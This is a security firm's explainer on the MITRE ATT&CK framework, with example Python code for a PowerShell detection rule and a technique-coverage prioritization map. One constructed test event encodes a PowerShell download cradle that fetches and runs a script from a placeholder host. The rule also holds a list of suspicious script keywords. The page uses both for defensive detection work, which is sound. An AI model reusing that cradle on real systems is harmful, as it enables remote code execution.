Adversarial Risk Group

What is the MITRE ATT&CK framework?

MITRE ATT&CK is a knowledge base of adversary tactics, techniques, and procedures derived from observed real-world attacks.

Key takeaways

  • MITRE ATT&CK provides a common vocabulary for describing attacker behavior at the technique level. Red teams, blue teams, threat intelligence, and detection engineering all reference the same model.
  • The framework has three matrices: Enterprise (IT and cloud), Mobile, and ICS. Each contains tactics (the why), techniques (the how), and sub-techniques (more specific how).
  • Mapping detection coverage to ATT&CK techniques surfaces gaps at the level a detection engineer can act on: a named technique with no rule behind it, rather than a control family marked "partially implemented".
  • For mid-market manufacturers, the practical use of ATT&CK is to drive detection engineering priorities and to communicate findings across teams.
  • ARG maps every engagement finding to specific ATT&CK techniques, so the output reads cleanly into the framework defenders are using.

How is MITRE ATT&CK structured?

ATT&CK organizes adversary behavior at four levels of specificity.

1. Tactics. The "why" of an attacker action. The strategic goal at a particular stage of an attack. The Enterprise matrix defines 14 tactics, in roughly the order they happen during an intrusion:

  • Reconnaissance (TA0043)
  • Resource Development (TA0042)
  • Initial Access (TA0001)
  • Execution (TA0002)
  • Persistence (TA0003)
  • Privilege Escalation (TA0004)
  • Defense Evasion (TA0005)
  • Credential Access (TA0006)
  • Discovery (TA0007)
  • Lateral Movement (TA0008)
  • Collection (TA0009)
  • Command and Control (TA0011)
  • Exfiltration (TA0010)
  • Impact (TA0040)

2. Techniques. The "how" - specific methods adversaries use to achieve each tactic. Examples:

  • Phishing (T1566) under Initial Access
  • Command and Scripting Interpreter (T1059) under Execution; PowerShell (T1059.001) is one of its sub-techniques
  • OS Credential Dumping (T1003) under Credential Access
  • Lateral Tool Transfer (T1570) under Lateral Movement
  • Data Encrypted for Impact (T1486) under Impact

3. Sub-techniques. More specific variants of techniques. Phishing (T1566) has sub-techniques for Spearphishing Attachment (T1566.001), Spearphishing Link (T1566.002), Spearphishing via Service (T1566.003), and Spearphishing Voice (T1566.004).

4. Procedures. The actual implementation of a technique by a specific threat actor. Not a separate ID; described in the documentation for each technique with examples from real attacks. "FIN7 uses spearphishing emails with a Windows Script File attachment" is a procedure.

The four-level structure gives the framework precision without losing usability. A high-level conversation can reference tactics; an operational conversation can reference techniques; a detection engineering session can reference sub-techniques; a threat intelligence report can reference procedures.

The ATT&CK Enterprise, Mobile, and ICS matrices

MITRE maintains three matrices, each focused on a specific environment.

Enterprise. The largest matrix. Covers IT systems, cloud platforms, enterprise applications. Techniques are tagged by platform: Windows, macOS, Linux, Cloud (IaaS, SaaS, and the office-suite and identity-provider platforms), Network, and Containers, and the matrix can be filtered to any one of them. Most relevant for the IT side of a mid-market manufacturer's environment.

Mobile. Adversary behavior against iOS and Android devices. Smaller than Enterprise. Useful for mid-market manufacturers with significant mobile workforce or BYOD exposure.

ICS. Industrial control systems. Adds tactics with no Enterprise equivalent, Inhibit Response Function and Impair Process Control, plus Impact techniques specific to physical processes such as Loss of Productivity and Revenue and Damage to Property; initial access arrives through techniques such as Engineering Workstation Compromise. Critical for manufacturers because the Enterprise matrix does not cover OT-specific adversary behavior. See What is an industrial control system (ICS)?.

For a mid-market manufacturer, both Enterprise and ICS matrices are operationally relevant. The Enterprise matrix covers the office IT environment and the IT side of OT-adjacent systems. The ICS matrix covers the OT environment specifically. A complete security program references both.

Why ATT&CK works as a common vocabulary across red, blue, and purple

Three properties make ATT&CK uniquely useful as a cross-team framework.

  1. Empirically grounded. Techniques are derived from observed real-world attacks. The framework is descriptive, not prescriptive. A technique in ATT&CK exists because someone has observed it being used; speculative or theoretical attacks are not included.
  2. Specific without being narrow. Techniques are specific enough to be operationally useful (a detection rule can target a specific technique) but broad enough to survive minor variants (T1059.001 PowerShell covers many specific PowerShell-based attacks).
  3. Maintained as a living document. MITRE updates ATT&CK regularly as new techniques are observed and old techniques evolve. The framework tracks reality.

The cross-team value:

  • Red teams describe their work in ATT&CK terms. "I exercised T1078 (Valid Accounts) followed by T1021 (Remote Services)" is precise and reproducible.
  • Blue teams track detection coverage against ATT&CK. "We have detection coverage for T1059.001 PowerShell but not for T1059.003 Windows Command Shell" is actionable.
  • Threat intelligence reports use ATT&CK to describe observed threat actor behavior. "This ransomware affiliate uses T1566.002, T1078, T1486."
  • Purple teams use ATT&CK to organize the engagement: "Today we are exercising five techniques in Credential Access and three in Lateral Movement." See What is purple teaming?.
  • Compliance maps controls to ATT&CK techniques. NIST SP 800-53 controls (via MITRE's Center for Threat-Informed Defense) and CIS Safeguards both have published ATT&CK mappings.
  • Incident response describes observed attacker behavior in ATT&CK terms during and after the incident, which standardizes lessons-learned and supports threat intelligence sharing.

The common vocabulary reduces translation overhead between teams and produces shared situational awareness.

Examples of techniques manufacturers are most exposed to

The techniques mid-market manufacturers face most often. Each one is worth knowing by ID:

  • T1566 Phishing (and sub-techniques). The dominant initial-access vector. See What is spear phishing?.
  • T1078 Valid Accounts. Use of stolen or default credentials to access systems. The follow-on to most phishing attacks.
  • T1059 Command and Scripting Interpreter. PowerShell, Windows Command Shell, Python. Most ransomware uses one or more of these.
  • T1003 OS Credential Dumping. LSASS access, credential theft from memory. The key step from initial access to lateral movement.
  • T1021 Remote Services. RDP, SMB, WinRM. Used for lateral movement once credentials are stolen.
  • T1567 Exfiltration Over Web Service. Data exfiltration over HTTPS, often to cloud storage. The data-loss step of most ransomware-extortion attacks.
  • T1486 Data Encrypted for Impact. Ransomware encryption. The final step that produces the visible incident.
  • T0859 Valid Accounts (ICS). OT-side equivalent of T1078. Used to access engineering workstations and SCADA systems.
  • T0843 Program Download (ICS). Modifying or replacing PLC programs. See What is a PLC attack?.
  • T1556 Modify Authentication Process. Weakening or bypassing MFA (T1556.006) and conditional access policies (T1556.009) so a stolen account keeps working. The cloud-identity techniques that usually travel with it are catalogued separately: consent-phishing OAuth grants are T1528 Steal Application Access Token, and mailbox rule modifications are T1564.008 Email Hiding Rules. See What is consent phishing (OAuth phishing)?.

A detection program with coverage of these ten techniques addresses a large fraction of the realistic threat for a mid-market manufacturer. The list is not exhaustive; it is a starting prioritization.

How to use ATT&CK to prioritize detection engineering

Detection engineering with ATT&CK proceeds through five steps.

  1. Identify the threat actors and groups most likely to target the organization. For a defense-supplier manufacturer, this includes ransomware affiliates (LockBit, BlackBasta, Akira), BEC operator groups, and (less commonly) nation-state actors. MITRE publishes group profiles with associated techniques.
  2. Build a technique coverage map. For each technique used by the identified groups, document the current detection state: detected and alerting, detected and logged, not detected. The map shows the actual coverage state at the technique level.
  3. Prioritize gaps by frequency and impact. Techniques used by many groups (high frequency) with high impact when successful drive the priority list. Techniques rarely used or low-impact wait.
  4. Build or tune detections for the priority gaps. Each detection is built against a specific technique, with documentation, tunings, and false-positive controls.
  5. Validate through simulation. Adaptive simulation, breach and attack simulation, and purple team exercises run the real technique against the new detections to confirm they actually fire, not just that the rule parses.

The cycle repeats. Coverage maps update; new threat intelligence brings new priorities; detection drift surfaces during validation; the program improves measurably over time.
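What step 4 looks like for one technique, as an added example that is not code from the original page or from ARG: a SIEM-style rule built against T1059.001 that carries its ATT&CK metadata, a tuning allowlist for a known false-positive source, and a decoding step that enriches the alert, run over constructed Sysmon-style process-creation events as the step-5 check in miniature. The agent path in the allowlist, the hostnames and the URL in the sample script are hypothetical.

```python
"""Detection engineering against one ATT&CK technique (T1059.001, PowerShell).

Added example: a SIEM-style rule with its ATT&CK metadata, a false-positive
tuning, and constructed Sysmon-like process-creation events to run it over.
"""
import base64
import re
from typing import Optional

# Metadata travels with the rule so a coverage map can be generated from code.
RULE = {
    "name": "PowerShell encoded command",
    "technique": "T1059.001",   # Command and Scripting Interpreter: PowerShell
    "tactic": "TA0002",         # Execution
    "source": "SIEM",
}

POWERSHELL_IMAGES = ("powershell.exe", "pwsh.exe")
# PowerShell accepts any unambiguous prefix of -EncodedCommand; a production
# rule should enumerate all of them, this regex lists the common ones.
ENCODED_FLAG = re.compile(r"(?i)\s[-/](?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
# Decoded-script indicators that raise severity from medium to high.
SUSPICIOUS = ("invoke-expression", "iex", "downloadstring", "frombase64string")
# Tuning: parent processes that legitimately launch encoded PowerShell.
# Hypothetical path, an assumption for this example.
ALLOWED_PARENTS = {r"c:\program files\examplecorp agent\agent.exe"}


def decode_encoded_command(b64: str) -> Optional[str]:
    """-EncodedCommand is base64 over UTF-16LE; return None if it is not."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def evaluate(event: dict) -> Optional[dict]:
    """Return an alert dict if the event matches the rule, else None."""
    image = event.get("Image", "").lower()
    if not image.endswith(POWERSHELL_IMAGES):
        return None
    match = ENCODED_FLAG.search(event.get("CommandLine", ""))
    if not match:
        return None
    if event.get("ParentImage", "").lower() in ALLOWED_PARENTS:
        return None  # tuned out: known-good parent
    decoded = decode_encoded_command(match.group(1))
    indicators = [s for s in SUSPICIOUS if decoded and s in decoded.lower()]
    return {
        "rule": RULE["name"],
        "technique": RULE["technique"],
        "tactic": RULE["tactic"],
        "host": event.get("Computer"),
        "parent": event.get("ParentImage"),
        "decoded": decoded,
        "indicators": indicators,
        "severity": "high" if indicators else "medium",
    }


def run(events: list) -> list:
    return [alert for alert in map(evaluate, events) if alert]


def encoded(script: str) -> str:
    """Build an -EncodedCommand argument the way an attacker's loader would."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events (Sysmon event 1 fields), not real telemetry.
SAMPLE_EVENTS = [
    {   # macro-spawned download cradle: should alert, high severity
        "Computer": "WS-014", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "CommandLine": "powershell.exe -nop -w hidden -enc "
        + encoded("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"),
    },
    {   # plain scheduled script: no encoded flag, no alert
        "Computer": "WS-014", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    },
    {   # management agent using -ec: suppressed by the tuning allowlist
        "Computer": "SRV-02", "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
        "ParentImage": r"C:\Program Files\ExampleCorp Agent\agent.exe",
        "CommandLine": "pwsh.exe -ec " + encoded("Get-Service | Where-Object Status -eq Running"),
    },
    {   # cmd.exe with a look-alike flag: wrong image, never evaluated
        "Computer": "SRV-02", "Image": r"C:\Windows\System32\cmd.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "cmd.exe /c echo -enc QUJDREVGR0hJSktMTU5PUA==",
    },
]

if __name__ == "__main__":
    for alert in run(SAMPLE_EVENTS):
        print(alert["technique"], alert["severity"], alert["host"], alert["decoded"])
```

The allowlist is the "false-positive control" the step calls for, and it is scoped to the parent image rather than to the whole technique: the agent's encoded commands stay suppressed, while the same flag from an Office parent still alerts. The third sample event is the case a validation run must include, because a detection that fires on the simulation but also on the management agent gets tuned out by the SOC within a week.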

Best practices for mapping controls to ATT&CK

For organizations using ATT&CK to organize their security program:

  1. Map detections, not just controls. A control (EDR deployed) is not the same as a detection (a specific rule that fires on a specific technique). The detection map is what matters operationally.
  2. Use the official ATT&CK Navigator or equivalent tooling. Don't recreate the matrix in a spreadsheet; use the tools MITRE publishes or commercial equivalents.
  3. Track coverage by source. EDR rules, SIEM rules, identity-provider detections, OT-monitoring detections. Multiple sources covering the same technique provide depth; gaps where no source covers a technique are clearer.
  4. Differentiate detect vs prevent. A technique can be prevented (the attack does not succeed) or detected (the attack succeeds and is noticed). Both are valuable; the program needs visibility into which it has for each technique.
  5. Annotate confidence. Detection of T1003.001 with high confidence (an EDR-vendor-built rule with low false-positive rate) is different from a custom SIEM rule that fires occasionally on the right technique. The annotation matters for prioritization.
  6. Update with each detection change. When a detection is added, modified, or removed, the coverage map updates. The map is a live artifact, not an annual report.
  7. Coordinate with threat intelligence. New techniques emerging in the wild produce new priority gaps. The detection program needs a feed from threat intelligence (commercial, government, ISAC, industry).
  8. Communicate coverage to executives in ATT&CK terms. "We cover 70% of the techniques used by ransomware affiliates targeting manufacturers" is more useful than "we have EDR everywhere".
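One way to carry steps 2 and 3 of the detection-engineering cycle above into code, and to capture the source, detect-versus-prevent and confidence annotations that best practices 3 to 5 call for, as an added example that is neither ARG's tooling nor MITRE's: a small coverage map that scores uncovered techniques by group frequency times impact and exports an ATT&CK Navigator layer. The group-to-technique sets, the impact scores, the detection inventory and the Navigator version fields are constructed assumptions; real input comes from MITRE's group pages and the organization's own rule inventory.

```python
"""Technique coverage map, gap prioritization and Navigator layer export.

Added example. All inputs below are constructed; real group technique lists
come from MITRE's group profiles and real detections from the rule inventory.
"""
import json
from collections import Counter
from dataclasses import dataclass

# Step 1 output, constructed: technique sets per tracked group (illustrative only).
GROUP_TECHNIQUES = {
    "ransomware-affiliate-A": {"T1566.001", "T1078", "T1059.001", "T1003.001",
                               "T1021.001", "T1567.002", "T1486"},
    "ransomware-affiliate-B": {"T1566.002", "T1078", "T1059.003", "T1003.001",
                               "T1021.002", "T1486"},
    "bec-operator": {"T1566.002", "T1078.004", "T1528", "T1564.008"},
}
# Analyst impact judgement, 1 (low) to 5 (high); constructed for the example.
IMPACT = {"T1486": 5, "T1003.001": 4, "T1567.002": 4, "T1078": 3, "T1078.004": 3,
          "T1021.001": 3, "T1021.002": 3, "T1528": 3, "T1059.001": 2, "T1059.003": 2,
          "T1566.001": 2, "T1566.002": 2, "T1564.008": 2}


@dataclass(frozen=True)
class Detection:
    technique: str    # ATT&CK ID the rule is built against
    source: str       # EDR, SIEM, IdP, email gateway, OT monitor
    mode: str         # "detect" (noticed after the fact) or "prevent" (blocked)
    state: str        # "alerting" or "logged"
    confidence: str   # "high", "medium", "low": analyst annotation, not a metric


# Constructed detection inventory (best practice 1: detections, not controls).
DETECTIONS = [
    Detection("T1059.001", "EDR", "detect", "alerting", "high"),
    Detection("T1059.001", "SIEM", "detect", "alerting", "medium"),
    Detection("T1566.001", "email-gateway", "prevent", "alerting", "high"),
    Detection("T1003.001", "EDR", "prevent", "alerting", "high"),
    Detection("T1486", "EDR", "detect", "logged", "low"),
    Detection("T1078", "IdP", "detect", "logged", "medium"),
]


def coverage_map(detections):
    """Technique ID -> detections. A parent-technique rule is NOT credited to its
    sub-techniques here (the conservative choice): T1078 does not cover T1078.004."""
    cov = {}
    for d in detections:
        cov.setdefault(d.technique, []).append(d)
    return cov


def coverage_state(entries) -> str:
    if not entries:
        return "not detected"
    if any(e.state == "alerting" for e in entries):
        return "detected and alerting"
    return "detected and logged"


def prioritize(groups=GROUP_TECHNIQUES, impact=IMPACT, detections=DETECTIONS):
    """Steps 2 and 3: one row per technique, gaps first, scored by frequency x impact."""
    freq = Counter(t for techniques in groups.values() for t in techniques)
    cov = coverage_map(detections)
    rows = []
    for technique, n_groups in freq.items():
        entries = cov.get(technique, [])
        rows.append({
            "technique": technique,
            "groups": n_groups,
            "impact": impact.get(technique, 1),
            "state": coverage_state(entries),
            "sources": sorted({e.source for e in entries}),
            "modes": sorted({e.mode for e in entries}),
            "confidence": sorted({e.confidence for e in entries}),
            # Only uncovered techniques compete for the backlog.
            "priority": n_groups * impact.get(technique, 1) if not entries else 0,
        })
    return sorted(rows, key=lambda r: (-r["priority"], -r["groups"], r["technique"]))


def navigator_layer(rows, name="coverage"):
    """ATT&CK Navigator layer dict. The version fields are assumptions: set them
    to the ATT&CK and Navigator versions actually in use."""
    colour = {"detected and alerting": "#2e7d32",
              "detected and logged": "#f9a825",
              "not detected": "#c62828"}
    return {
        "name": name,
        "domain": "enterprise-attack",
        "versions": {"attack": "16", "navigator": "5.1.0", "layer": "4.5"},
        "description": "Coverage by technique; score = number of tracked groups using it",
        "techniques": [{
            "techniqueID": r["technique"],
            "score": r["groups"],
            "color": colour[r["state"]],
            "comment": f"{r['state']}; sources={','.join(r['sources']) or 'none'}; "
                       f"modes={','.join(r['modes']) or 'none'}",
        } for r in rows],
    }


if __name__ == "__main__":
    ranked = prioritize()
    for r in ranked:
        print(f"{r['technique']:<10} groups={r['groups']} impact={r['impact']} "
              f"priority={r['priority']} {r['state']} {r['sources']}")
    print(json.dumps(navigator_layer(ranked), indent=2))
```

With the constructed inputs the top two gaps are T1566.002 (two groups, impact 2) and T1567.002 (one group, impact 4), which is the point of scoring by frequency times impact rather than frequency alone: the exfiltration technique that only one tracked group uses still outranks a cheap-to-detect technique used by several. The sources and modes lists per row are what makes the "EDR everywhere" conversation concrete: T1003.001 shows a single source in prevent mode, so a bypass of that one EDR control leaves the technique unobserved.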

MITRE ATT&CK FAQs

Is ATT&CK a framework or a knowledge base?

Technically a knowledge base. MITRE describes it as a knowledge base, not a framework or a standard. In practice, the security industry uses ATT&CK as a framework for organizing detection engineering, threat intelligence, and adversarial simulation. The terminology distinction matters less than the operational usage.

How is ATT&CK different from the Cyber Kill Chain?

The Lockheed Martin Cyber Kill Chain is a higher-level model with seven sequential phases. ATT&CK is a more detailed knowledge base with hundreds of specific techniques organized into fourteen tactics (Enterprise matrix). The Kill Chain provides a strategic frame; ATT&CK provides operational detail. Many organizations use both: Kill Chain for strategy conversations, ATT&CK for technical work.

Does MITRE ATT&CK cover physical attacks?

Partially. The Enterprise matrix includes initial-access techniques that have physical elements (e.g., Hardware Additions T1200, Replication Through Removable Media T1091). The ICS matrix covers physical-impact and physical-access concepts in industrial settings. Pure facility-entry tradecraft (tailgating, badge cloning, pretext entry) is not the primary focus; it falls under social engineering and physical-security frameworks. See What is physical penetration testing?.

What is the difference between ATT&CK and D3FEND?

ATT&CK catalogs adversary behavior; D3FEND catalogs defensive countermeasures. The two are complementary: ATT&CK tells you what attackers do, D3FEND tells you what defenses address each technique. D3FEND is newer and less widely adopted than ATT&CK but increasingly referenced in detection engineering work.

How ARG reports findings against ATT&CK techniques

Every ARG engagement finding maps to one or more MITRE ATT&CK techniques. The mapping happens during the engagement, so the report reads in the framework the client's detection team uses.

The mapping is done by James Wall on the digital side, with David Ashby contributing physical and OT mappings. It covers both the Enterprise and ICS matrices where appropriate.

For each finding, the report includes:

  • Primary technique reference. The ATT&CK ID and name (T1566.001 Spearphishing Attachment, T1078 Valid Accounts, T0843 Program Download, etc.).
  • Associated tactic. Initial Access, Credential Access, Lateral Movement, Impact, etc.
  • Sub-techniques where applicable. More specific reference (T1566.002 for credential-harvest spear phishing).
  • Procedure description. What ARG specifically did during the engagement.
  • Detection state. Whether the technique was detected by the client's existing stack, and where the gap is if not.

Over multiple engagements, ARG produces a technique-coverage map specific to the client. The map shows which techniques the simulation has exercised, which were caught, which were missed, and how coverage has trended over time. The trend is the value: the program either improves measurably (more techniques caught faster) or it does not.

The output feeds two specific surfaces:

  1. The client's detection engineering backlog. Specific techniques with gaps become specific detection-engineering work items. See What is purple teaming?.
  2. Insurance and compliance evidence. Underwriters and assessors increasingly ask for ATT&CK-mapped evidence. The continuous engagement produces the documentation as a byproduct.

For founding clients, the technique-coverage map is part of the quarterly review packet alongside the risk register and the broader compliance-mapped findings.

Apply as a founding client or see how the engagement works for the full delivery cycle.

Find what gets through.

ARG runs continuous AI-driven adversarial simulation and on-site physical audits for mid-market manufacturers. Two founding-client spots remain.

Author: James Wall. Updated 2026-05-18.